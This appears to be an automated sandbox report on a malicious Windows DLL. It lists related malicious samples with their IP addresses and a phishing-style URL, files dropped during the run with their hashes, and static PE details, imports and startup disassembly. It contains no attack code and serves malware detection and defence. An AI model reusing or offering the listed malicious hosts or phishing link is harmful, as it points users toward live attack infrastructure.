	BP1566jQZs	Get hash	malicious	Browse	91.250.109.108
	https://sqmtnx.starkdesarrollos.com/#lrivera@rogersbenefit.com	Get hash	malicious	Browse	151.106.103.187
	swift copy$48,400.exe	Get hash	malicious	Browse	151.106.109.245
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	151.106.112.196
	PO_04-29-2022_0929.lnk	Get hash	malicious	Browse	151.106.112.196

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.3593198815979092
Encrypted:	false
SSDEEP:	12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5:	BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1:	C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256:	BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512:	00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious:	false
Preview:	.......................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MPEG-4 LOAS
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.24945211236917778
Encrypted:	false
SSDEEP:	1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4W:BJiRdwfu2SRU4W
MD5:	3F009DE8C33BD5D56F2730E76ABEF252
SHA1:	7975B3B9CE79B045942B1809D130BB85F255BA6F
SHA-256:	D9DB11286D60A5FF3B94A391D57BB9A2DFC937B7585F46D3EABDCBEF76C3A864
SHA-512:	DAC97742582D8028D1BB62D14ED1835C5BDA666634C4CF98968E45A3C31075C911FB7B26EFAF8EDC79D796BD13E291429BE5FAD9FC5C926F5F5FFEC7936F1263
Malicious:	false
Preview:	V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x4bcb5d55, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	786432
Entropy (8bit):	0.25066957097854525
Encrypted:	false
SSDEEP:	384:7Ds+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:7DzSB2nSB2RSjlK/+mLesOj1J2
MD5:	2299E58D4722D935108AC00D119D2019
SHA1:	DFA4B4582025768774093009A1684FC225FB4FCC
SHA-256:	4BD4A14D5E60CD12465156B52B1C67DC75B702B153BCD2886301D4602FC31163
SHA-512:	75FC8EE62F4E0579AAAB1FE3D05189925FE041776AA75074C490F8B7997A5711D92B1F0A0FE73814FA6DC80C540E8A0E49BC0E888616D0954DEB141D86943DAE
Malicious:	false
Preview:	K.]U... ................e.f.3...w........................)..........zW.8....z..h.(..........zW...)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................G.......zW..................N#{.....zW.........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07608939966405562
Encrypted:	false
SSDEEP:	3:lSZ7vdXzYae+fThh1lQfjll3Vkttlmlnl:0ZrtzYELhhy3
MD5:	4404387E95D7685CF75B89E948025180
SHA1:	2FF0D036942E959BDF25FCA7BD1505FFD104AD43
SHA-256:	45CC1CE7CE35BBB92D84E7AFAE1A9BE0ECA4FDB0A57F6FAEE4BA613C16F812A1
SHA-512:	3648FAD98DE9E0FF9B3DC71E8D53FA4DABCE777EAE9A8C2BBFF3E66722D2A6CC4A46CA2DE401B2C1EA2F5BA18EADBB7EE92F45D308C70979AD78663C54ACA8E5
Malicious:	false
Preview:	.6.T.....................................3...w..8....z.......zW..............zW......zW....F.....z...................N#{.....zW.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 61480 bytes, 1 file
Category:	dropped
Size (bytes):	61480
Entropy (8bit):	7.9951219482618905
Encrypted:	true
SSDEEP:	1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
MD5:	B9F21D8DB36E88831E5352BB82C438B3
SHA1:	4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
SHA-256:	998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
SHA-512:	D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
Malicious:	false
Preview:	MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4\|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D\|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......\|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU.....V.{V6..m..D.-\|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..\| .#.......I...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	330
Entropy (8bit):	3.122334359224131
Encrypted:	false
SSDEEP:	6:kK8kcoJN+SkQlPlEGYRMY9z+4KlDA3RUesJ21:0kPlE99SNxAhUesE1
MD5:	886EB70A75522EB0062EFBF23EDC4255
SHA1:	C1F8D12560EC3EB055FF6BBEB44D22949FE52515
SHA-256:	28D8C9F33AF6870278128E7694FD9CB0C5C087B4012DBF9DE2347DF7081FE072
SHA-512:	B684753725009FD215379E031983ADEBF927FB584DCC741FF0CE2F8747FAAD390366D3092B187313ECE1B4D18F826D4F677FE7EE332C32587537E998CFE90A08
Malicious:	false
Preview:	p...... ........5A.M.m..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	10844
Entropy (8bit):	3.1615380513055005
Encrypted:	false
SSDEEP:	192:cY+38+DJM+i2Jt+iDQ+yw+f0+rU+0Jtk+EOtF+E7tC+EwR+W:j+s+i+Z+z+B+c+Y+0g+J+j+1+W
MD5:	13EF14E375B094C9DB093476F12CEF29
SHA1:	CBC402589A80A403798525211054EEE8AC42070F
SHA-256:	53C6F0D03A8164CB449A97D645409A88F06DFBAFD749C2F6744488EFA3873890
SHA-512:	A3D65DB82C529C1AFCD734DAF64A98887A0490F826F26B4F630BC72BE8B1BBE49FEDF2EB26516A8909047A46474BE2C16D1405B72015E9098287CD99BD3BC454
Malicious:	false
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.u.n. .. 2.7. .. 2.0.1.9. .0.1.:.2.9.:.4.9.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.............-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.416842204867434
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	FC6cLk6kKz.dll
File size:	626688
MD5:	4d859466611b663b26b8f88b6c6b396e
SHA1:	cf04bea97bdd034deaecc4d666e0b6c572e15181
SHA256:	dbdbe1e46d20b345284721de5f11990137ecc40770e369768634ef1f52d9e7bb
SHA512:	e3d089aba241514911222df0ce982482bac19b4bf074c022608d6176a67a4f0f8f0947499d02fef2c85ddf2954e55c615fcba9da42cdc3fe40734754fb28b04c
SSDEEP:	6144:XvRov7wREVy3B6yu4YXep2v5uYxlzmsgrR8drCSi78SLUYeDrQ0Ax+xSEN:ZsVyXu4YupcuY7mxrSsmD8fx+xJ
TLSH:	77D46C117691C832FC9A5F34359392BD1FF87F64AAA48227EF903A4D6BB35008E146D7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........7...d...d...d+..d...d+..d...d...d...d.!.d...d.!.d`..d.!.dv..d.!.d...d.!.d...d.!.d...dRich...d................PE..L...p.<b...

File Icon


Icon Hash:	71b018ccc6577131

Static PE Info

General

Entrypoint:	0x100209c7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x623C8770 [Thu Mar 24 15:00:00 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	196752bd65f33bc6f5dd0426f39259ae

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
jne 00007F3668B60557h
call 00007F3668B67A5Ah
push dword ptr [esp+04h]
mov ecx, dword ptr [esp+10h]
mov edx, dword ptr [esp+0Ch]
call 00007F3668B60442h
pop ecx
retn 000Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 100397B4h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
test eax, eax
pop edi
mov dword ptr [ebp-04h], eax
pop esi
je 00007F3668B6055Eh
test byte ptr [eax], 00000008h
je 00007F3668B60559h
mov dword ptr [ebp-0Ch], 01994000h
lea eax, dword ptr [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push dword ptr [ebp-1Ch]
push dword ptr [ebp-20h]
call dword ptr [100360E0h]
leave
retn 0008h
push 00000000h
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
push dword ptr [esp+14h]
call 00007F3668B67B29h
add esp, 14h
ret
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F3668B60576h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F3668B605A0h
test ecx, 00000003h
jne 00007F3668B60541h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx

Rich Headers

Programming Language:

[RES] VS2005 build 50727
[ C ] VS2005 build 50727
[EXP] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2005 build 50727
[LNK] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x434c0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x41914	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4b000	0x480b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94000	0x3fe8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x3b9a0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36000	0x53c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x4188c	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x340f7	0x35000	False	0.566585900649	data	6.63826832293	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x36000	0xd514	0xe000	False	0.31640625	data	4.88588216589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x44000	0x6598	0x3000	False	0.261067708333	data	4.03018775491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x4b000	0x480b4	0x49000	False	0.545162671233	data	6.34867299025	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x94000	0x8660	0x9000	False	0.305528428819	data	3.82304724634	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
\x42c\x422\x41d\x420\x418\x412\x427\x426	0x4c074	0x20800	data	Spanish	Mexico
RT_CURSOR	0x6c874	0x134	data
RT_CURSOR	0x6c9a8	0xb4	data
RT_CURSOR	0x6ca5c	0x134	AmigaOS bitmap font
RT_CURSOR	0x6cb90	0x134	data
RT_CURSOR	0x6ccc4	0x134	data
RT_CURSOR	0x6cdf8	0x134	data
RT_CURSOR	0x6cf2c	0x134	data
RT_CURSOR	0x6d060	0x134	data
RT_CURSOR	0x6d194	0x134	data
RT_CURSOR	0x6d2c8	0x134	data
RT_CURSOR	0x6d3fc	0x134	data
RT_CURSOR	0x6d530	0x134	data
RT_CURSOR	0x6d664	0x134	AmigaOS bitmap font
RT_CURSOR	0x6d798	0x134	data
RT_CURSOR	0x6d8cc	0x134	data
RT_CURSOR	0x6da00	0x134	data
RT_BITMAP	0x6db34	0xb8	data
RT_BITMAP	0x6dbec	0x144	data
RT_ICON	0x6dd30	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6e018	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6e140	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6e428	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6e550	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6e838	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6e960	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6ec48	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6ed70	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6f058	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6f180	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6f468	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6f590	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6f878	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6f9a0	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 67108992, next used block 3293332676	Spanish	Mexico
RT_ICON	0x6fc88	0x128	GLS_BINARY_LSB_FIRST	Spanish	Mexico
RT_ICON	0x6fdb0	0x10828	dBase III DBT, version number 0, next free block index 40	Spanish	Mexico
RT_ICON	0x805d8	0x10828	dBase III DBT, version number 0, next free block index 40	Spanish	Mexico
RT_DIALOG	0x90e00	0x12c	data
RT_DIALOG	0x90f2c	0x134	data
RT_DIALOG	0x91060	0xfe	data
RT_DIALOG	0x91160	0x34	data
RT_STRING	0x91194	0x52	data
RT_STRING	0x911e8	0xb0	Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952
RT_STRING	0x91298	0x30	data
RT_STRING	0x912c8	0x1d0	data
RT_STRING	0x91498	0x5bc	data
RT_STRING	0x91a54	0x31c	data
RT_STRING	0x91d70	0x300	data
RT_STRING	0x92070	0xb0	data
RT_STRING	0x92120	0xee	data
RT_STRING	0x92210	0x11e	data
RT_STRING	0x92330	0x4d0	data
RT_STRING	0x92800	0x248	data
RT_STRING	0x92a48	0x2e	data
RT_STRING	0x92a78	0x4c	data
RT_GROUP_CURSOR	0x92ac4	0x22	Lotus unknown worksheet or configuration, revision 0x2
RT_GROUP_CURSOR	0x92ae8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92afc	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b10	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b24	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b38	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b4c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b60	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b74	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b88	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92b9c	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92bb0	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92bc4	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92bd8	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR	0x92bec	0x14	Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON	0x92c00	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92c24	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92c48	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92c6c	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92c90	0x14	data	Spanish	Mexico
RT_GROUP_ICON	0x92ca4	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92cc8	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92cec	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92d10	0x22	data	Spanish	Mexico
RT_GROUP_ICON	0x92d34	0x14	data	Spanish	Mexico
RT_VERSION	0x92d48	0x314	data
RT_MANIFEST	0x9305c	0x56	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	GetFileAttributesA, GetFileTime, GetTickCount, HeapAlloc, HeapFree, RtlUnwind, HeapReAlloc, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetCommandLineA, GetProcessHeap, RaiseException, HeapSize, VirtualFree, HeapDestroy, HeapCreate, GetStdHandle, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, Sleep, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetACP, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, LCMapStringA, LCMapStringW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetThreadLocale, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, GlobalFlags, WritePrivateProfileStringA, InterlockedIncrement, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, InterlockedDecrement, GlobalGetAtomNameA, GlobalFindAtomA, lstrcmpW, GetVersionExA, FreeResource, GetCurrentProcessId, GlobalAddAtomA, CloseHandle, GetCurrentThread, GetCurrentThreadId, ConvertDefaultLocale, GetModuleFileNameA, EnumResourceLanguagesA, GetLocaleInfoA, LoadLibraryA, lstrcmpA, FreeLibrary, GlobalDeleteAtom, GetModuleHandleA, GetProcAddress, GlobalFree, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, LocalFree, MulDiv, SetLastError, ExitProcess, GetCurrencyFormatW, FindResourceA, LoadResource, LockResource, SizeofResource, lstrlenA, CompareStringW, CompareStringA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, SetHandleCount, InterlockedExchange
USER32.dll	GetNextDlgGroupItem, MessageBeep, UnregisterClassA, RegisterClipboardFormatA, PostThreadMessageA, SetCapture, LoadCursorA, GetSysColorBrush, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, MoveWindow, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, DestroyMenu, SetWindowContextHelpId, MapDialogRect, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, InvalidateRgn, GetWindowTextA, GetForegroundWindow, GetTopWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, GetSysColor, AdjustWindowRectEx, EqualRect, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, SetWindowPos, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, GetWindow, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, CharUpperA, DrawIcon, AppendMenuA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, GetWindowThreadProcessId, GetWindowLongA, GetLastActivePopup, IsWindowEnabled, MessageBoxA, SetCursor, SetWindowsHookExA, InvalidateRect, SetRect, IsRectEmpty, CopyAcceleratorTableA, CharNextA, ReleaseCapture, SendMessageA, GetSystemMenu, IsIconic, GetClientRect, EnableWindow, LoadIconA, GetSystemMetrics, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, PostQuitMessage, PostMessageA, CheckMenuItem, EnableMenuItem, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, GetClassLongA
GDI32.dll	SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, GetStockObject, GetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, TextOutA, RectVisible, PtVisible, GetDeviceCaps, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, ExtTextOutA, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateBitmap, GetWindowExtEx
comdlg32.dll	GetFileTitleA
WINSPOOL.DRV	DocumentPropertiesA, OpenPrinterA, ClosePrinter
ADVAPI32.dll	RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegEnumKeyA, RegDeleteKeyA, RegOpenKeyExA, RegQueryValueExA, RegOpenKeyA, RegCloseKey
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll
ole32.dll	OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CLSIDFromString, CoRevokeClassObject, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromProgID
OLEAUT32.dll	VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy, VariantClear

Exports

Name	Ordinal	Address
